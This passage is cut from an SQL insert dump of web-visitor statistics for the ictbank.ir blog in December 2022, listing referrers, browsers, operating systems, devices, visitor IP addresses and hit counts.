(26774,'2022-12-15','http://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(26775,'2022-12-15','http://baidu.com/','Bing Search','Android','6.0.0','mobile:smart','Mate 9','','27.115.124.38','000',0,1,0),
(26776,'2022-12-15','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,2,0),
(26777,'2022-12-15','http://ictbank.ir/','Vivo Browser','Android','8.0.0.0','mobile:smart','Unknown','','152.32.186.247','000',0,1,0),
(26778,'2022-12-15','https://www.google.com/','Chrome','Windows','108.0.0.0','desktop','Unknown','','178.142.168.156','000',0,1,0),
(26779,'2022-12-15','http://ictbank.ir/blog','Chrome','Windows','12.0.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(26780,'2022-12-15','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.210','000',0,2,0),
(26781,'2022-12-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.46','000',0,2,0),
(26782,'2022-12-15','http://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','152.32.200.193','000',0,3,0),
(26783,'2022-12-15','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,6,0),
(26784,'2022-12-15','https://www.google.com/','Chrome','Windows','108.0.0.0','desktop','Unknown','','194.196.23.141','000',0,1,0),
(26785,'2022-12-15','https://www.bing.com/','Edge','Windows','108.0.0.0','desktop','Unknown','','186.19.254.253','000',0,1,0),
(26786,'2022-12-15','http://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','35.90.109.74','000',0,1,0),
(26787,'2022-12-15','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.118.118','000',0,1,0),
(26788,'2022-12-15','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','104.238.170.64','000',0,1,0),
(26789,'2022-12-15','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.62.98.236','000',0,1,0),
(26790,'2022-12-15','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','78.141.244.3','000',0,1,0),
(26791,'2022-12-15','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','90.0.0.0','desktop','Unknown','','37.139.53.22','000',0,8,0),
(26792,'2022-12-16','http://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(26793,'2022-12-16','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','139.162.215.70','000',0,2,0),
(26794,'2022-12-16','http://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','3.216.132.243','000',0,1,0),
(26795,'2022-12-16','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,14,0),
(26796,'2022-12-16','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','5.189.171.179','000',0,1,0),
(26797,'2022-12-16','http://45.92.94.221:80/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(26798,'2022-12-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.36','000',0,2,0),
(26799,'2022-12-16','https://www.google.com/','Chrome','Windows','108.0.0.0','desktop','Unknown','','113.160.225.155','000',0,1,0),
(26800,'2022-12-16','https://www.bing.com','Chrome','Windows','35.0.0.0','desktop','Unknown','','103.153.68.244','000',0,1,0),
(26801,'2022-12-16','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,2,0),
(26802,'2022-12-16','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','113.125.140.19','000',0,2,0),
(26803,'2022-12-16','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,2,0),
(26804,'2022-12-16','https://www.google.com/','Firefox','Windows','108.0','desktop','Unknown','','212.81.185.202','000',0,1,0),
(26805,'2022-12-16','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','213.168.251.151','000',0,2,0),
(26806,'2022-12-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.54','000',0,2,0),
(26807,'2022-12-16','http://ictbank.ir/','Vivo Browser','Android','8.0.0.0','mobile:smart','Unknown','','36.255.220.222','000',0,1,0),
(26808,'2022-12-16','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','162.221.192.26','000',0,2,0),
(26809,'2022-12-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','68.69.184.202','000',0,1,0),
(26810,'2022-12-16','http://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','109.229.213.23','000',0,1,0),
(26811,'2022-12-16','http://ictbank.ir/blog','Chrome','Windows','89.0.0.0','desktop','Unknown','','107.20.96.195','000',0,3,0),
(26812,'2022-12-16','https://www.google.com/','Chrome','Windows','108.0.0.0','desktop','Unknown','','5.236.232.77','000',0,3,0),
(26813,'2022-12-16','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.118.113','000',0,1,0),
(26814,'2022-12-16','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.124.61','000',0,1,0),
(26815,'2022-12-16','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.62.98.236','000',0,1,0),
(26816,'2022-12-16','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.239.244','000',0,1,0),
(26817,'2022-12-16','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.136','000',0,2,0),
(26818,'2022-12-16','http://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(26819,'2022-12-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.53','000',0,2,0),
(26820,'2022-12-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.108','000',0,2,0),
(26821,'2022-12-16','http://ictbank.ir/blog','Chrome','OS X','91.0.0.0','desktop','Macintosh','','18.221.152.170','000',0,3,0),
(26823,'2022-12-16','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.251.102.74','000',0,2,0),
(26824,'2022-12-16','http://45.92.94.221:80/blog','Firefox','Windows','65.0','desktop','Unknown','','45.83.66.140','000',0,1,0),
(26825,'2022-12-16','http://ictbank.ir/blog','Safari','OS X','5.0','desktop','Macintosh','','208.80.194.122','000',0,1,0),
(26826,'2022-12-17','http://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','51.254.59.113','000',0,1,0),
(26827,'2022-12-17','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','180.149.125.159','000',0,1,0),
(26828,'2022-12-17','http://ictbank.ir/blog','Chrome','Windows','46.0.0.0','desktop','Unknown','','162.240.54.183','000',0,5,0),
(26829,'2022-12-17','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.133.58','000',0,2,0),
(26830,'2022-12-17','http://ictbank.ir/blog','Chrome','Linux','12.0.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(26831,'2022-12-17','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','14.116.157.23','000',0,2,0),
(26832,'2022-12-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.108','000',0,2,0),
(26833,'2022-12-17','http://ictbank.ir/blog','Chrome','Linux','106.0.0.0','desktop','Unknown','','44.227.127.2','000',0,2,0),
(26834,'2022-12-17','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,2,0),
(26835,'2022-12-17','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(26836,'2022-12-17','http://45.92.94.221:80/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(26837,'2022-12-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.46','000',0,2,0),
(26838,'2022-12-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.178','000',0,1,0),
(26839,'2022-12-17','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.221.111.82','000',0,1,0),
(26840,'2022-12-17','http://ictbank.ir/blog','Firefox','Ubuntu','102.0','desktop','Unknown','','51.89.201.226','000',0,9,0),
(26841,'2022-12-17','https://www.google.com/','Chrome','Linux','108.0.0.0','desktop','Unknown','','79.119.38.65','000',0,1,0),
(26842,'2022-12-17','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.62.98.236','000',0,1,0),
(26843,'2022-12-17','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','188.166.159.169','000',0,2,0),
(26844,'2022-12-17','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.239.244','000',0,1,0),
(26845,'2022-12-17','http://ictbank.ir/blog','Chrome','Windows','96.0.0.0','desktop','Unknown','','31.192.232.23','000',0,2,0),
(26846,'2022-12-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.60','000',0,2,0),
(26847,'2022-12-17','http://ictbank.ir/blog','Chrome','Windows','12.0.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(26848,'2022-12-17','http://ictbank.ir/blog','Unknown','Linux','Unknown','desktop','Unknown','','176.9.111.189','000',0,1,0),
(26849,'2022-12-18','http://ictbank.ir/blog','Chrome','OS X','53.0.0.0','desktop','Macintosh','','60.191.125.35','000',0,1,0),
(26850,'2022-12-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.46','000',0,4,0),
(26851,'2022-12-18','http://ictbank.ir/blog','Firefox','Windows','5.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(26852,'2022-12-18','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,2,0),
(26853,'2022-12-18','http://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','170.187.252.253','000',0,4,0),
(26854,'2022-12-18','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','113.125.140.19','000',0,2,0),
(26855,'2022-12-18','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.242','000',0,1,0),
(26856,'2022-12-18','http://ictbank.ir/blog','Android Browser','Android','Unknown','tablet','Unknown','','8.142.64.24','000',0,2,0),
(26857,'2022-12-18','http://ictbank.ir/blog','Chrome','Windows','85.0.0.0','desktop','Unknown','','186.239.35.70','000',0,24,0),
(26858,'2022-12-18','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(26859,'2022-12-18','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.133.58','000',0,2,0),
(26860,'2022-12-18','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,2,0),
(26861,'2022-12-18','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.213.61.147','000',0,2,0),
(26862,'2022-12-18','http://45.92.94.221/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.143','000',0,2,0),
(26863,'2022-12-18','https://www.bing.com','Chrome','OS X','35.0.0.0','desktop','Macintosh','','185.199.221.172','000',0,3,0),
(26864,'2022-12-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.53','000',0,2,0),
(26865,'2022-12-18','http://ictbank.ir/','Firefox','Linux','102.0','desktop','Unknown','','176.106.247.22','000',0,1,0),
(26866,'2022-12-18','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.80','000',0,2,0),
(26867,'2022-12-18','http://wikisonnati.com','Chrome','Windows','17.0.0.0','desktop','Unknown','','209.127.96.200','000',0,2,0),
(26868,'2022-12-18','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.186.32.110','000',0,1,0),
(26869,'2022-12-18','http://ictbank.ir/blog','Android Browser','Android','Unknown','tablet','Unknown','','39.103.168.88','000',0,8,0),
(26870,'2022-12-18','http://ictbank.ir/blog','Sogou Explorer','Windows','Unknown','desktop','Unknown','','120.27.23.177','000',0,2,0),
(26871,'2022-12-18','http://ictbank.ir/blog','Firefox','Windows','41.0','desktop','Unknown','','159.122.162.228','000',0,1,0),
(26872,'2022-12-18','http://ictbank.ir/blog','Firefox','Windows','41.0','desktop','Unknown','','158.177.250.148','000',0,1,0),
(26873,'2022-12-18','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(26874,'2022-12-18','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.199.124.59','000',0,2,0),
(26875,'2022-12-18','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','78.141.244.3','000',0,1,0),
(26876,'2022-12-18','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.62.98.236','000',0,1,0),
(26877,'2022-12-18','http://www.ictbank.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','178.128.44.235','000',0,2,0),
(26878,'2022-12-18','http://design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.47','000',0,2,0),
(26879,'2022-12-19','http://ictbank.ir/blog','Opera','Windows','9.0','desktop','Unknown','','23.129.64.227','000',0,1,0),
(26880,'2022-12-19','http://design-arena.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','164.68.106.210','000',0,2,0),
(26881,'2022-12-19','http://ictbank.ir/blog/index.php/tag/database/','Chrome','Windows','90.0.0.0','desktop','Unknown','','37.139.53.20','000',0,7,0),
(26882,'2022-12-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','68.69.184.202','000',0,2,0),
(26883,'2022-12-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.11','000',0,4,0),
(26884,'2022-12-19','http://ictbank.ir/blog','Firefox','Windows','5.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(26885,'2022-12-19','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','140.246.164.95','000',0,2,0),
(26886,'2022-12-19','http://ns10.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.142','000',0,2,0),
(26887,'2022-12-19','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,2,0),
(26888,'2022-12-19','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.219.157.113','000',0,2,0),
(26889,'2022-12-19','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(26890,'2022-12-19','http://45.92.94.221:80/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(26891,'2022-12-19','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.217.115.14','000',0,1,0),
(26892,'2022-12-19','https://www.google.com/','Chrome','Linux','105.0.0.0','desktop','Unknown','','189.121.201.200','000',0,1,0),
(26893,'2022-12-19','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,2,0),
(26894,'2022-12-19','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.63.115.86','000',0,1,0),
(26895,'2022-12-19','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.218.44','000',0,1,0),
(26896,'2022-12-19','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.62.98.236','000',0,1,0),
(26897,'2022-12-19','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','78.141.244.3','000',0,1,0),
(26898,'2022-12-19','http://wikisonnati.com','Internet Explorer','Windows','10.0','desktop','','','8.210.110.162','000',0,2,0),
(26899,'2022-12-20','http://www.ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','207.180.240.189','000',0,2,0),
(26900,'2022-12-20','https://www.bing.com','Chrome','Windows','29.0.0.0','desktop','Unknown','','64.227.184.83','000',0,20,0),
(26901,'2022-12-20','http://ictbank.ir/blog','Chrome','OS X','107.0.0.0','desktop','Macintosh','','195.201.225.227','000',0,2,0),
(26902,'2022-12-20','https://www.google.com/','Chrome','Windows','108.0.0.0','desktop','Unknown','','49.207.211.52','000',0,1,0),
(26903,'2022-12-20','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','140.246.164.95','000',0,2,0),
(26904,'2022-12-20','http://ictbank.ir/blog','Safari','OS X','5.0','desktop','Macintosh','','208.80.194.121','000',0,2,0),
(26905,'2022-12-20','https://www.bing.com','Chrome','Windows','41.0.0.0','desktop','Unknown','','134.122.7.10','000',0,1,0),
(26906,'2022-12-20','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,1,0),
(26907,'2022-12-20','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','180.149.125.159','000',0,2,0),
(26908,'2022-12-20','http://ictbank.ir/blog','Firefox','OS X','68.0','desktop','Macintosh','','51.254.199.11','000',0,2,0),
(26909,'2022-12-20','http://ictbank.ir/blog','Safari','OS X','5.0','desktop','Macintosh','','208.80.194.126','000',0,2,0),
(26910,'2022-12-20','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','18.246.53.221','000',0,2,0),
(26911,'2022-12-20','https://www.google.com/','Chrome','Windows','108.0.0.0','desktop','Unknown','','95.249.60.175','000',0,1,0),
(26912,'2022-12-20','http://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','5.88.237.196','000',0,1,0),
(26913,'2022-12-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.108','000',0,2,0),
(26914,'2022-12-20','http://45.92.94.221:80/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','54.91.116.152','000',0,1,0),
(26915,'2022-12-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.46','000',0,2,0),
(26916,'2022-12-20','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.251.102.74','000',0,2,0),
(26917,'2022-12-20','http://ictbank.ir','Chrome','OS X','14.0.0.0','desktop','Macintosh','','178.212.48.70','000',0,3,0),
(26918,'2022-12-20','http://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','5.188.62.26','000',0,2,0),
(26919,'2022-12-20','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.62.98.236','000',0,2,0),
(26920,'2022-12-20','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.63.115.86','000',0,1,0),
(26921,'2022-12-20','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','188.166.159.169','000',0,1,0),
(26922,'2022-12-20','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.71','000',0,2,0),
(26923,'2022-12-20','http://45.92.94.221/blog','Chrome','Linux','86.0.0','desktop','Unknown','','58.56.146.62','000',0,2,0),
(26924,'2022-12-20','http://design-arena.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','176.74.192.85','000',0,2,0),
(26925,'2022-12-20','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.251.102.90','000',0,2,0),
(26926,'2022-12-20','http://ictbank.ir/blog/index.php/tag/characterset/','Chrome','Windows','90.0.0.0','desktop','Unknown','','37.139.53.40','000',0,7,0),
(26927,'2022-12-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','18.209.168.113','000',0,4,0),
(26928,'2022-12-20','http://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','162.243.184.200','000',0,2,0),
(26929,'2022-12-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','18.209.168.113','000',0,34,0),
(26930,'2022-12-21','http://ictbank.ir/blog','Chrome','Android','55.0.0.0','mobile:smart','Nexus 5','','111.85.200.68','000',0,1,0),
(26931,'2022-12-21','http://ictbank.ir/blog','Chrome','Android','55.0.0.0','mobile:smart','Nexus 5','','110.52.194.100','000',0,1,0),
(26932,'2022-12-21','http://ictbank.ir/blog','Safari','iOS','9.0','tablet','iPad','','111.224.235.153','000',0,1,0),
(26933,'2022-12-21','http://ictbank.ir/blog','Safari','iOS','9.0','tablet','iPad','','36.32.2.7','000',0,1,0),
(26934,'2022-12-21','http://ictbank.ir/blog','Chrome','Windows','63.0.0.0','desktop','Unknown','','222.94.163.166','000',0,1,0),
(26935,'2022-12-21','http://ictbank.ir/blog','Chrome','Windows','63.0.0.0','desktop','Unknown','','139.170.202.60','000',0,1,0),
(26936,'2022-12-21','http://ictbank.ir/blog','Safari','iOS','9.0','tablet','iPad','','59.50.181.130','000',0,1,0),
(26937,'2022-12-21','http://ictbank.ir/blog','Safari','iOS','9.0','tablet','iPad','','182.138.158.30','000',0,1,0),
(26938,'2022-12-21','http://ictbank.ir/blog','Chrome','OS X','47.0.0.0','desktop','Macintosh','','61.147.15.67','000',0,3,0),
(26939,'2022-12-21','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,2,0),
(26940,'2022-12-21','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(26941,'2022-12-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','74.84.150.150','000',0,2,0),
(26942,'2022-12-21','http://mail.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.73','000',0,2,0),
(26943,'2022-12-21','http://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(26944,'2022-12-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','167.86.125.45','000',0,1,0),
(26945,'2022-12-21','http://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','185.181.60.189','000',0,3,0),
(26946,'2022-12-21','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,2,0),
(26947,'2022-12-21','http://ictbank.ir/blog','Chrome','Windows','34.0.0.0','desktop','Unknown','','178.62.82.141','000',0,1,0),
(26948,'2022-12-21','http://ictbank.ir/blog','Firefox','OS X','68.0','desktop','Macintosh','','51.254.199.11','000',0,3,0),
(26949,'2022-12-21','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.214.251.48','000',0,2,0),
(26950,'2022-12-21','http://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','5.188.62.174','000',0,3,0),
(26951,'2022-12-21','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.73','000',0,1,0),
(26952,'2022-12-21','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.138','000',0,4,0),
(26953,'2022-12-21','http://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','44.204.110.251','000',0,1,0),
(26954,'2022-12-21','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','187.103.250.210','000',0,2,0),
(26955,'2022-12-21','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.170','000',0,2,0),
(26956,'2022-12-21','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','163.172.56.94','000',0,1,0),
(26957,'2022-12-21','http://45.92.94.221:80/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(26958,'2022-12-21','http://ictbank.ir/blog','Chrome','Windows','65.0.0.0','desktop','Unknown','','159.65.152.123','000',0,2,0),
(26959,'2022-12-21','http://ictbank.ir/blog','Chrome','Windows','89.0.0.0','desktop','Unknown','','185.119.81.108','000',0,4,0),
(26960,'2022-12-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.108','000',0,2,0),
(26961,'2022-12-21','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.32.144.195','000',0,1,0),
(26962,'2022-12-21','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.119.6','000',0,1,0),
(26963,'2022-12-21','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.128.165.136','000',0,1,0),
(26964,'2022-12-21','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','78.141.244.3','000',0,1,0),
(26965,'2022-12-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.31','000',0,2,0),
(26966,'2022-12-21','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','14.29.228.249','000',0,2,0),
(26967,'2022-12-21','http://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(26968,'2022-12-21','http://design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.209.46','000',0,2,0),
(26969,'2022-12-21','http://wikisonnati.com./blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','213.24.130.107','000',0,2,0),
(26970,'2022-12-22','http://45.92.94.221/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.117','000',0,1,0),
(26971,'2022-12-22','http://45.92.94.221/blog/','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.107','000',0,1,0),
(26972,'2022-12-22','http://wikisonnati.com/blog','Safari','iOS','15.0','mobile:smart','iPhone','','192.71.10.105','000',0,1,0),
(26973,'2022-12-22','http://wikisonnati.com/blog/','Safari','iOS','15.0','mobile:smart','iPhone','','192.71.2.171','000',0,1,0),
(26974,'2022-12-22','http://ictbank.ir/blog','Chrome','Windows','64.0.0.0','desktop','Unknown','','185.119.81.108','000',0,4,0),
(26975,'2022-12-22','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','159.223.219.242','000',0,2,0),
(26976,'2022-12-22','http://wikisonnati.com','Chrome','Windows','50.0.0.0','desktop','Unknown','','114.108.148.220','000',0,2,0),
(26977,'2022-12-22','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','152.89.196.13','000',0,1,0),
(26978,'2022-12-22','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,4,0),
(26979,'2022-12-22','http://ictbank.ir/blog','Chrome','Windows','65.0.0.0','desktop','Unknown','','204.48.26.148','000',0,3,0),
(26980,'2022-12-22','http://ictbank.ir/blog','Chrome','Windows','85.0.0.0','desktop','Unknown','','14.44.97.209','000',0,19,0),
(26981,'2022-12-22','http://ictbank.ir/blog','Chrome','Windows','22.0.0.0','desktop','Unknown','','45.143.201.87','000',0,2,0),
(26982,'2022-12-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','74.84.150.150','000',0,1,0),
(26983,'2022-12-22','http://ictbank.ir/blog/index.php/tag/sql/','Chrome','Windows','90.0.0.0','desktop','Unknown','','37.139.53.50','000',0,7,0),
(26984,'2022-12-22','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','182.43.148.98','000',0,2,0),
(26985,'2022-12-22','http://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(26986,'2022-12-22','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.219.245.45','000',0,2,0),
(26987,'2022-12-22','http://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','85.3.252.101','000',0,1,0),
(26988,'2022-12-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.11','000',0,2,0),
(26989,'2022-12-22','http://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(26990,'2022-12-22','https://www.google.com.pe/','Chrome','Windows','108.0.0.0','desktop','Unknown','','179.6.13.189','000',0,1,0),
(26991,'2022-12-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','139.162.16.198','000',0,36,0),
(26992,'2022-12-22','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.124.61','000',0,1,0),
(26993,'2022-12-22','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.210.248','000',0,1,0),
